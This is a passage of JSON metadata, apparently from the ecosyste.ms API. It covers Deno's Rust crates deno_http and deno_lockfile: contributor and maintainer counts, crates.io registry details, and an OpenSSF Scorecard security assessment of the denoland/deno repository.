nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":386,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:27.477Z","updated_at":"2022-11-07T18:29:27.477Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:28.213Z","updated_at":"2023-07-18T22:41:28.213Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5930094,"name":"deno_lockfile","ecosystem":"cargo","description":"An implementation of a lockfile used in Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":79,"first_release_published_at":"2023-01-23T15:16:53.044Z","latest_release_published_at":"2026-08-27T15:20:45.968Z","latest_release_number":"0.60.0","last_synced_at":"2026-09-07T22:56:32.251Z","created_at":"2023-01-23T15:18:18.518Z","updated_at":"2026-09-07T22:56:32.251Z","registry_url":"https://crates.io/crates/deno_lockfile/","install_command":"cargo install deno_lockfile","documentation_url":"https://docs.rs/deno_lockfile/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2